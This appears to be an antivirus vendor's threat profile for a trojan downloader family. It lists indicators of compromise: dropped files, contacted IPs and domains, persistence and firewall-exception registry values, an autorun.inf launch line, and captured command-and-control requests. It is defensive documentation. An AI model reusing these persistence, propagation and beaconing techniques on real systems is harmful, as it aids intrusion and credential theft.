For Consumer

Virus Profile: Generic Downloader.g

Threat Search
Print
   
Virus Profile information details
Risk Assessment: Home Low | Corporate Low
Date Discovered: 3/31/2005
Date Added: 10/6/2004
Origin: N/A
Length: Varies
Type: Trojan
Subtype: Win32
DAT Required: 7273
Removal Instructions
   
 
 
   

Description

This is a trojan detection. Unlike viruses, trojans do not self-replicate. They are spread manually, often under the premise that they are beneficial or wanted. The most common installation methods involve system or security exploitation, and unsuspecting users manually executing unknown programs. Distribution channels include email, malicious or hacked web pages, Internet Relay Chat (IRC), peer-to-peer networks, etc.

Aliases

  • Nod32  - Win32/Spy.Zbot.AAO trojan
  • Symantec - Trojan.Gen
  • Microsoft - PWS:Win32/Zbot
  • Norman  - W32/ZBot.BJKJ (trojan)
  • Avira  - TR/Spy.ZBot.EB.107

Indication of Infection

    • Presence of above mentioned files and registry keys.
    • Presence of above mentioned activities.
    • It connects to the the following sites and downloads malicious files
      • [removed]eaarc.com/down/update10h.rar
      • [removed]eaard.com/down/hou.rar
      • [removed]eaarb.com/down/hou.rar

Methods of Infection

Trojans do not self-replicate. They are spread manually, often under the premise that the executable is something beneficial. Distribution channels include IRC, peer-to-peer networks, newsgroup postings, etc.
   

Virus Characteristics

------------------------Updated on April 17th 2014-------------------------------

Aliases –

  • Kaspersky        -    Trojan.Win32.Agent.icbs
  • fortinet        -    W32/Dloader.G!tr
  • sunbelt            -    Trojan.Win32.Generic!BT


Characteristics:

“ Generic Downloader.g” is detection for a Trojan that downloads other malicious files.

Upon execution the Trojan connects to the below IP Address

  • 37.[removed].127

Upon execution the following files have been added to the system.

  • %temp%\ABF54AE500247FF4B4909FF295A1AC9C44F08D65
  • %temp%\nse9.tmp\file1.exe
  • %temp%\nse9.tmp\file2.exe
  • %WINDIR%\System32\dfrg\mst.exe
  • %WINDIR%\System32\dfrg\stub.exe
  • %WINDIR%\System32\dfrg\reg_util.exe
  • %WINDIR%\System32\dfrg\svc.exe
  • %temp%\nsc11.tmp\Processes.dll
  • %temp%\nsmE.tmp
  • %temp%\nsc11.tmp
  • %temp%\nsd8.tmp
  • %temp%\nse9.tmp
  • %temp%\nsw1E.tmp
  • %temp%\nsh1F.tmp
  • %temp%\pack.tmp
  • %temp%\pack.tmp
  • %temp%\nsc11.tmp\utils_plugin.dll
  • %temp%\nsh1F.tmp\System.dll
  • %temp%\nsh1F.tmp\SimpleSC.dll
  • %appdata%\Updater\updater.dll
  • %temp%\nsc11.tmp\NSISdl.dll

 

------------------------Updated on Feb 20th 2014-------------------------------

Aliases –

  • ESET-NOD32        -     Win32/Delf.OGJ
  • Kaspersky        -     Trojan.Win32.Boht.acl
  • Microsoft        -     TrojanDownloader:Win32/Umbald.A


" Generic Downloader.g "  is a worm that may propagate via removable drives or network shares. Also, it is designed to download other malicious files.

Upon execution, worm creates the following files in the below location:

  • :[Removabledrive]\starter.exe

Also it drops an autorun.inf file into the root of all removable drives and mapped drives in an attempt to autorun an executable when the drive is accessed.

The file "AutoRun.inf" is pointing to the malware binary executable, when the removable or networked drive is accessed from a machine supporting the Autorun feature, the malware is launched automatically.

The autorun.inf is configured to launch the Worm file via the following command syntax.

[AUTORUN]
open=starter.exe

Upon execution the Trojan connects to the following URL’s.

  • hxxp://199.7.[Removed].190/pca3.crl
  • hxxp://199.7.[Removed].190/CSC3-2009-2.crl
  • to[Removed]g.ru

The following registry key has been added to the system.

  • HKEY_LOCAL_MACHINE \SOFTWARE\Microsoft\#xP#J4DG   

The following registry key value has been added to the system.

  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost.exe: "" %userprofile%\Desktop\1360675196.exe""

The above registry entry confirms that the Worm gets executed upon every system boot.

Worm creates the mutex in the following name

  • #xP#J4DG
------------------------Updated on December 12th 2013--------------------

Aliases

  • Microsoft    -     TrojanDownloader:Win32/Upatre.J
  • Kaspersky    -     Trojan.Win32.Agent.ibgu
  • Symantec    -     Trojan.Zbot

 

“Generic Downloader.g” is detection for a Trojan that download malicious file from remote server and executes in user system. It also steals sensitive information from the compromised machine and sends it to the remote attacker. It spread via spam mail as attachment. The Trojan may delete itself after the execution.  


 “Generic Downloader.g” steals information from stored passwords, cache and cookies from the following applications:

  • E-mail client
  • Browser
  • FTP client

Upon Execution, the Trojan drops file into the following location:

  • %AppData%\Microsoft\Address Book\username.wab
  • %AppData%\ Eceg\ryraaf.exe [Detected as pwszbot-fln!30b785b93eea]
  • %temp%\ supdater.exe[Detected as downloader-fxr!9ebc342110dc]
  • %UserProfile%\Local Settings\Temporary InternetFiles\Content.IE5\FJ6SRVGY\ pdf[1].exe[Detected as pwszbot-fln!e77e5c42c51a]

The following are the folders created by the Trojan

  • %AppData%\Microsoft\Address Book
  • %AppData%\Eceg


Upon execution the Trojan injects code into explorer.exe and tries to connect to the following URL .

  • tuho.[Removed].al.net
  • 10.[Removed].190
  • 104.[Removed].99
  • 111.[Removed].86
  • 112.[Removed].31
  • 114.[Removed].80
  • 116.[Removed].140
  • 122.[Removed].172
  • 13.[Removed].41
  • 130.[Removed].217
  • 130.[Removed].212
  • 135.[Removed].120
  • 135.[Removed].91
  • 139.[Removed].74
  • 139.[Removed].85
  • 140.[Removed].211
  • 144.[Removed].95
  • 149.[Removed].85
  • 150.[Removed].59
  • 151.[Removed].217
  • 160.[Removed].190
  • 162.[Removed].213
  • 164.[Removed].137
  • 165.[Removed].197
  • 166.[Removed].178
  • 168.[Removed].186
  • 168.[Removed].37
  • 169.[Removed].93
  • 172.[Removed].68
  • 172.[Removed].195
  • 177.[Removed].178
  • 178.[Removed].83
  • 181.[Removed].2
  • 184.[Removed].186
  • 186.[Removed].83
  • 187.[Removed].202
  • 191.[Removed].109
  • 192.[Removed].188
  • 193.[Removed].217
  • 196.[Removed].123
  • 198.[Removed].201
  • 198.[Removed].206
  • 2.[Removed].209
  • 20.[Removed].71
  • 200.[Removed].5
  • 204.[Removed].201
  • 204.[Removed].72
  • 21.[Removed].190
  • 21.[Removed].81
  • 210.[Removed].69
  • 212.[Removed].108
  • 214.[Removed].31
  • 216.[Removed].84
  • 218.[Removed].201
  • 220.[Removed].41
  • 221.[Removed].95
  • 221.[Removed].86
  • 222.[Removed].94
  • 224.[Removed].195
  • 226.[Removed].75
  • 226.[Removed].81
  • 226.[Removed].5
  • 228.[Removed].101
  • 23.[Removed].188
  • 23.[Removed].176
  • 230.[Removed].217
  • 231.[Removed].178
  • 232.[Removed].2
  • 239.[Removed].95
  • 240.[Removed].71
  • 241.[Removed].86
  • 244.[Removed].220
  • 247.[Removed].49
  • 249.[Removed].23
  • 250.[Removed].81
  • 250.[Removed].217
  • 251.[Removed].41
  • 252.[Removed].213
  • 252.[Removed].80
  • 253.[Removed].213
  • 255.[Removed].37
  • 255.[Removed].192
  • 27.[Removed].84
  • 27.[Removed].193
  • 30.[Removed].122
  • 31.[Removed].79
  • 31.[Removed].79
  • 32.[Removed].76
  • 32.[Removed].95
  • 33.[Removed].86
  • 33.[Removed].87
  • 34.[Removed].5
  • 38.[Removed].69
  • 4.[Removed].213
  • 40.[Removed].83
  • 42.[Removed].81
  • 45.[Removed].37
  • 45.[Removed].109
  • 5.[Removed].202
  • 5.[Removed].202
  • 52.[Removed].80
  • 54.[Removed].58
  • 56.[Removed].86
  • 57.[Removed].217
  • 58.[Removed].220
  • 58.[Removed].95
  • 59.[Removed].41
  • 59.[Removed].81
  • 6.[Removed].202
  • 62.[Removed].89
  • 66.[Removed].96
  • 66.[Removed].91
  • 68.[Removed].198
  • 68.[Removed].121
  • 69.[Removed].188
  • 70.[Removed].87
  • 71.[Removed].120
  • 74.[Removed].87
  • 74.[Removed].87
  • 78.[Removed].94
  • 79.[Removed].107
  • 81.[Removed].217
  • 9.[Removed].130
  • 90.[Removed].79
  • 90.[Removed].195
  • 92.[Removed].69
  • 92.[Removed].86
  • 92.[Removed].96
  • 98.[Removed].86
  • 99.[Removed].5
  • 99.[Removed].182
  • 188.[Removed].69
  • 05478e63.sk.[Removed].nd.com
  • 058177229054.ctinets.com
  • 10.[Removed].clarocom.net
  • 107-203-52-79.[Removed].net
  • 108-240-232-212.[Removed].net
  • 132.[Removed].fr
  • 139.[Removed].es
  • 166.[Removed].amsterdamtelecom.ru
  • 184.[Removed].[Removed].net.pe
  • 190-39-2-21.[Removed].net
  • 198-83-248-206-dynamic.[Removed].248.206
  • 201-174-.[Removed].anstelco.net
  • 201-222-210-218.[Removed].cl
  • 204-66-27-72-br2-DYNAMIC-dsl.cwj.[Removed].ica.com
  • 209H196.[Removed].-2.nt.net
  • 220-135-82-58.[Removed].net
  • 244.[Removed].[Removed].jp
  • 41-133-220-59.[Removed].za
  • 454a9fd2.[Removed].net
  • 71-15-24-20.[Removed].charter.com
  • 71-45-149-240.[Removed].net
  • 76-224-181-32.[Removed].net
  • 85.[Removed].[Removed].sepanta.net
  • 87-198-210-74.[Removed].ie
  • 89-212-97-62.[Removed].net
  • 99-176-21-104.[Removed].net
  • a91-155-62-66.[Removed].aajakaista.fi
  • a96-17-182-66.[Removed].com
  • aaadel.man.[Removed].line.com
  • ABayonne-152-1-51-40.[Removed].fr
  • Adsl-41.[Removed].aviso.ci
  • adsl-69-107-110-92.[Removed].net
  • adsl-84-227-242-216.adslplus.ch
  • bb121-6-165-68.[Removed].sg
  • BB-136-192.[Removed].il
  • cable-178-149-.[Removed].rs
  • cable-94-189-230-78.[Removed].rs
  • catv.choicecable.net
  • cpc1-brig15-2-0-cust553.[Removed].net
  • CPE-120-146-174-135.[Removed].net.au
  • cpe-23-241-3-249.[Removed].com
  • cpe-75-185-113-226.[Removed].com
  • deibp9eh1--blueice2n2.[Removed].com
  • dnsdel.mantraonline.com
  • dynamic-37-142-243-45.[Removed].il
  • fw.[Removed].com
  • fw-113-52.kymp.net
  • host.colocrossing.com
  • host109-152-72-45.[Removed].com
  • host109-155-191-191.[Removed].com
  • host144-11-static.[Removed].it
  • host-197.[Removed].tedata.net
  • host217-44-118-57.[Removed].com
  • host221-207-static.[Removed].it
  • host224-021-032-195.retemetis.net
  • host239-202-dynamic.[Removed].it
  • host252-99-dynamic.[Removed].it
  • host31-109-static.[Removed].it
  • host31-48-238-214.[Removed].com
  • host31-50-25-112.[Removed].com
  • host31-53-dynamic.[Removed].it
  • host58-87-static.[Removed].it
  • host70-182-static.[Removed].it
  • host74-38-static.[Removed].it
  • host81-132-34-226.[Removed].com
  • host81-134-92-59.[Removed].com
  • host81-136-165-250.[Removed].com
  • host86-151-108-111.[Removed].com
  • host86-157-49-221.[Removed].com
  • host86-163-7-241.[Removed].com
  • host86-166-246-33.[Removed].com
  • host86-171-139-92.[Removed].com
  • host86-177-118-98.[Removed].com
  • host86-181-179-56.[Removed].com
  • host90-25-static.[Removed].it
  • host-95-104-19-32.[Removed].ge
  • i-83-67-62-186.freedom2surf.net
  • ip-188-121-51-69.[Removed].net
  • ip-37-188-242-255.eurotel.cz
  • LDijon-156-64-15-81.[Removed].fr
  • LMontsouris-156-26-14-114.[Removed].fr
  • LNeuilly-152-23-10-27.[Removed].fr
  • LVelizy-156-44-9-130.[Removed].fr
  • mail.[Removed].net
  • memmolo.[Removed].it
  • mx-ll-49.[Removed].[Removed].th
  • no-dns-yet.[Removed].uk
  • ns4.vsnl.com
  • ool-457c6026.[Removed].net
  • osservatoriorischilegali.it
  • OTWAON23-1242541707.[Removed].ca
  • p549FC41B.[Removed].de
  • p5B16EF87.[Removed].de
  • pdv.vipnetwork.fr
  • S0106100009110719.[Removed].net
  • sotris00.[Removed].gr
  • static-217-133-116-151.[Removed].it
  • static-37-49-224-168-vstarvps.estroweb.in
  • static-87-102-39-33.[Removed].COM
  • ubaye.u-strasbg.fr
  • 178.[Removed].177
  • 190.[Removed].21
  • 137.[Removed].164
  • 69.[Removed].92
  • 95.[Removed].32
  • 188.[Removed].23
  • 123.[Removed].196
  • 202.[Removed].187
  • 217.[Removed].151
  • 201.[Removed].204
  • 81.[Removed].42
  • 121.[Removed].68
  • 195.[Removed].224
  • 190.[Removed].10
  • 217.[Removed].230
  • 197.[Removed].165
  • 5.[Removed].226
  • 81.[Removed].21
  • 80.[Removed].114
  • 172.[Removed].122
  • 190.[Removed].160
  • 195.[Removed].90
  • 80.[Removed].252
  • 212.[Removed].130
  • 86.[Removed].56
  • 201.[Removed].218
  • 140.[Removed].116
  • 201.[Removed].198
  • 120.[Removed].135
  • 2.[Removed].232
  • 91.[Removed].66
  • 109.[Removed].45
  • 89.[Removed].62
  • 31.[Removed].214
  • 178.[Removed].231
  • 176.[Removed].23
  • 130.[Removed].9
  • 76.[Removed].32
  • 79.[Removed].31
  • 85.[Removed].149
  • 86.[Removed].241
  • 217.[Removed].57
  • 220.[Removed].58
  • 83.[Removed].186
  • 186.[Removed].168
  • 37.[Removed].168
  • 211.[Removed].140
  • 86.[Removed].98
  • 107.[Removed].79
  • 68.[Removed].172
  • 217.[Removed].193
  • 94.[Removed].222
  • 86.[Removed].92
  • 202.[Removed].5


The following are the registry key added to the system

  • HKEY_USERS\S-1-5-21[Varies]\Software\Microsoft\Internet Account Manager
  • HKEY_USERS\S-1-5-21[Varies]\Software\Microsoft\Internet Account Manager\Accounts
  • HKEY_USERS\S-1-5-21[Varies]\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC
  • HKEY_USERS\S-1-5-21[Varies]\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot
  • HKEY_USERS\S-1-5-21[Varies]\Software\Microsoft\Internet Account Manager\Accounts\VeriSign
  • HKEY_USERS\S-1-5-21[Varies]\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere
  • HKEY_USERS\S-1-5-21[Varies]\Software\Microsoft\ Uthouwn
  • HKEY_USERS\S-1-5-21[Varies]\Software\Microsoft\WAB
  • HKEY_USERS\S-1-5-21[Varies]\Software\Microsoft\WAB\WAB4
  • HKEY_USERS\S-1-5-21[Varies]\Software\Microsoft\WAB\WAB4\Wab File Name


  • HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts


  • HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List


The following registry key values have been added to the system.


  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\DisableNotifications: 0x00000000


The above mentioned registry key ensure that the Trojan disables the “firewall disable notification message” settings.


  • HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List\7303:UDP: "7303:UDP:*:Enabled:UDP 7303"


  • HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List\7070:TCP: "7070:TCP:*:Enabled:TCP 7070"


  • HKEY_USERS\S-1-5-21[Varies]\Software\Microsoft\Windows\CurrentVersion\Run\Upmiw:""%AppData%\ Eceg\ryraaf.exe ""


The above registry entry makes sure that the malware gets executed on every time when the system startup

  • HKEY_USERS\S-1-5-21[Varies]\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere\


o    LDAP Server ID: 0x00000003
o    Account Name: "WhoWhere Internet Directory Service"
o    LDAP Server: "ldap.whowhere.com"
o    LDAP URL: "http://www.whowhere.com"
o    LDAP Search Return: 0x00000064
o    LDAP Timeout: 0x0000003C
o    LDAP Authentication: 0x00000000
o    LDAP Simple Search: 0x00000001
o    LDAP Logo: "%ProgramFiles%\Common Files\Services\whowhere.bmp"

  • HKEY_USERS\S-1-5-21[Varies]\Software\Microsoft\Internet Account Manager\Accounts\VeriSign\


o    LDAP Server ID: 0x00000002
o    Account Name: "VeriSign Internet Directory Service"
o    LDAP Server: "directory.verisign.com"
o    LDAP URL: "http://www.verisign.com"
o    LDAP Search Return: 0x00000064
o    LDAP Timeout: 0x0000003C
o    LDAP Authentication: 0x00000000
o    LDAP Search Base: "NULL"
o    LDAP Simple Search: 0x00000001
o    LDAP Logo: "%ProgramFiles%\Common Files\Services\verisign.bmp"

  • HKEY_USERS\S-1-5-21[Varies]\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot\


o    LDAP Server ID: 0x00000001
o    Account Name: "Bigfoot Internet Directory Service"
o    LDAP Server: "ldap.bigfoot.com"
o    LDAP URL: "http://www.bigfoot.com"
o    LDAP Search Return: 0x00000064
o    LDAP Timeout: 0x0000003C
o    LDAP Authentication: 0x00000000
o    LDAP Simple Search: 0x00000001
o    LDAP Logo: "%ProgramFiles%\Common Files\Services\bigfoot.bmp"

  • HKEY_USERS\S-1-5-21[Varies]\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC\


o    LDAP Server ID: 0x00000000
o    Account Name: "Active Directory"
o    LDAP Server: "NULL"
o    LDAP Search Return: 0x00000064
o    LDAP Timeout: 0x0000003C
o    LDAP Authentication: 0x00000002
o    LDAP Simple Search: 0x00000000
o    LDAP Bind DN: 0x00000000
o    LDAP Port: 0x00000CC4
o    LDAP Resolve Flag: 0x00000001
o    LDAP Secure Connection: 0x00000000
o    LDAP User Name: "NULL"
o    LDAP Search Base: "NULL"

  • HKEY_USERS\S-1-5-21[Varies]\Software\Microsoft\Internet Account Manager\Accounts\


o    PreConfigVer: 0x00000004
o    PreConfigVerNTDS: 0x00000001

  • HKEY_USERS\S-1-5-21[Varies]\Software\Microsoft\Internet Account Manager\


o    Server ID: 0x00000004
o    Default LDAP Account: "Active Directory GC"

  • HKEY_USERS\S-1-5-21[Varies]\Software\Microsoft\ Viesasfa\36hed888: [Binary Data]
  • HKEY_USERS\S-1-5-21[Varies]\Software\Microsoft\ Viesasfa\325b6a52: [Binary Data]
  • HKEY_USERS\S-1-5-21[Varies]\Software\Microsoft\ Viesasfa\13b0622a: [Binary Data]
  • HKEY_USERS\S-1-5-21[Varies]\Software\Microsoft\ Viesasfa\2dei0g7f: [Binary Data]
  • HKEY_USERS\S-1-5-21[Varies]\Software\Microsoft\ Viesasfa\1fc2ab5f:: [Binary Data]
  • HKEY_USERS\S-1-5-21[Varies]\Software\Microsoft\ Viesasfa\jf50cj0: [Binary Data]
  • HKEY_USERS\S-1-5-21[Varies]\Software\Microsoft\WAB\WAB4\Wab File Name\: "%AppData%\Microsoft\Address Book\username.wab"


  • HKEY_USERS\S-1-5-21[Varies]\Software\Microsoft\WAB\WAB4


o    OlkContactRefresh: 0x00000000
o    OlkFolderRefresh: 0x00000000


------------------------------------------------------------------------------------------

-------- Updated on December 4th 2012---------

Aliases

  • Symantec    -    Backdoor.Wakeminap
  • Norman    -    W32/Agent.AKWQN (trojan)
  • Kaspersky    -    Trojan-Downloader.Win32.Agent.wlzn
  • Fortinet    -    W32/Agent.WLZN!tr.dldr

Generic Downloader.g” is detection for this Trojan that downloads other payloads.

Upon execution the Trojan drops files in the following location

%Temp%\POWER_GEN_2012.pdf
%Temp%\em.exe

Upon execution it tries to connect to the below URL through remote port http

  • http://63.73.[Removed].7/scripts/images/device_input.asp?device_t=2349438461&key=vrnnprjd&device_id=em&cv=vrnnprjdecejxvlub (application/x-www-form-urlencoded)
  • http://63.73. [Removed].7/scripts/images/record.asp?device_t=8533569937&key=rgsawyrs&device_id=em&cv=rgsawyrsdowrskfgx&result=%0D%0ATime%3A%09Tue%20Dec%2004%2015%3A32%3A19%202012%0AAgent%3A%09Mozilla%2F4.0%20(compatible%3B%20MSIE%207.0%3B%20Win32%3B%20Microsoft%20Windows%20XP%20Professional%20Service%20Pack%203%20(build%202600))%0D%0Aurl%20OK%21%0D%0Apickup%20command%20Ok%21%0D%0AMon%20Nov%2026%2008%3A29%3A26%202012%3B%20%09sleep%2024%0D%0Asleep%2024%09wakeup%3DWed%20Dec%2005%2015%3A32%3A22%202012%0A%0D%0ANext%3AWed%20Dec%2005%2015%3A32%3A22%202012%0Adelay%3A3600%20sec%0D%0A%0D%0A
  • http://63.73. [Removed].7/scripts/images/device_em.asp?device_t=4827883592&key=ijukawom&device_id=em&cv=ijukawomoqypvvfzl
  • www.helios[Removed]ners.com   
  • 7.11. [Removed].63


-------- Updated on September 17, 2012--------

“Generic Downloader.g” is detection for this Trojan that receives commands from an attacker to access the infected machine and to download other malicious files. The Trojan creates a firewall rule in order to bypass and it may allow the remote attacker to issue commands to control the compromised machines without user knowledge. Also it may steal compromised computers’ personal and confidential information from the following

  • Outlook Express passwords
  • Digital certificates
  • Internet Explorer cookies
  • Cached passwords

Upon execution the Trojan gets injected with explorer.exe and drop files in the below location

  • %Appdata%Microsoft\Address Book\Administrator.wab
  • %Appdata%Microsoft\Address Book\Administrator.wab~
  • %Appdata%/Aqozba\toynt.exe
  • %Appdata%/Dozyz\heact.adb
  • %Appdata%/Nozi\uwebi.tmp

Upon execution it tries to connect to the below URL through remote port http

  • sg.[Removed].real.com
  • sp[Removed]d.su
  • c[Removed]to.su
  • r[Removed]ks.su
  • e[Removed]alt.pl
  • r[Removed]rain.pl

Captured POST request:

  • POST /sopelka3/file.php HTTP/1.1
    Accept: */*
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
    Host: c[Removed]to.su
    Content-Length: 131
    Connection: Keep-Alive
    Cache-Control: no-cache
  • POST /dedun23/file.php HTTP/1.1
    Accept: */*
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
    Host: e[Removed]alt.pl
    Content-Length: 128
    Connection: Keep-Alive
    Cache-Control: no-cache
  • POST /dedun23/gate.php HTTP/1.1
    Accept: */*
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
    Host: re[Removed]ain.pl
    Content-Length: 341
    Connection: Keep-Alive
    Cache-Control: no-cache

The following registry keys have been added to the system

  • HKEY_USERS\S-1-5[Varies]\Software\Microsoft\Internet Explorer\Privacy
  • HKEY_USERS\S-1-5[Varies]\Software\Microsoft\Internet Account Manager
  • HKEY_USERS\S-1-5[Varies]\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere
  • HKEY_USERS\S-1-5[Varies]\Software\Microsoft\Liotfu
  • HKEY_USERS\S-1-5[Varies]\Software\Microsoft\WAB

The following registry values has been added to the system

  • HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\C:\WINDOWS\explorer.exe: "C:\WINDOWS\explorer.exe:*:Enabled:Windows Explorer"
  • HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\C:\WINDOWS\explorer.exe: "C:\WINDOWS\explorer.exe:*:Enabled:Windows Explorer"

The above registry ensures that the Trojan creates a firewall rule to bypass the normal authentication and it may allow the remote attacker to issue commands to control the compromised machines without user knowledge.

HKEY_USERS\S-1-5[Varies]\Software\Microsoft\Windows\CurrentVersion\Run\Vubavetie: ""%Appdata%Aqozba\toynt.exe""

The above mentioned registry ensures that, the Trojan registers with the compromised system and execute itself upon every boot

HKEY_USERS\S-1-5[Varies]\Software\Microsoft\Internet Explorer\Privacy\CleanCookies: 0x00000000

The above registry ensures that the Trojan prevents the removal of expired Internet Explorer browser cookies

The below registry key value confirms that the Trojan configures the LDAP server in order to steal confidential information.

HKEY_USERS\S-1-5[Varies]\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere\

  • LDAP Server ID: 0x00000003
  • Account Name: "WhoWhere Internet Directory Service"
  • LDAP Server: "ldap.whowhere.com"
  • LDAP URL: http://www.whowhere.com
  • LDAP Search Return: 0x00000064
  • LDAP Timeout: 0x0000003C
  • LDAP Authentication: 0x00000000
  • LDAP Simple Search: 0x00000001
  • LDAP Logo: "%ProgramFiles%\Common Files\Services\whowhere.bmp"

HKEY_USERS\S-1-5[Varies]\Software\Microsoft\Internet Account Manager\Accounts\VeriSign\

  • LDAP Server ID: 0x00000002
  • Account Name: "VeriSign Internet Directory Service"
  • LDAP Server: "directory.verisign.com"
  • LDAP URL: http://www.verisign.com
  • LDAP Search Return: 0x00000064
  • LDAP Timeout: 0x0000003C
  • LDAP Authentication: 0x00000000
  • LDAP Search Base: "NULL"
  • LDAP Simple Search: 0x00000001
  • LDAP Logo: "%ProgramFiles%\Common Files\Services\verisign.bmp"

HKEY_USERS\S-1-5[Varies]\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot\

   

All Users:
Use current engine and DAT files for detection and removal.

Modifications made to the system Registry and/or INI files for the purposes of hooking system startup, will be successfully removed if cleaning with the recommended engine and DAT combination (or higher).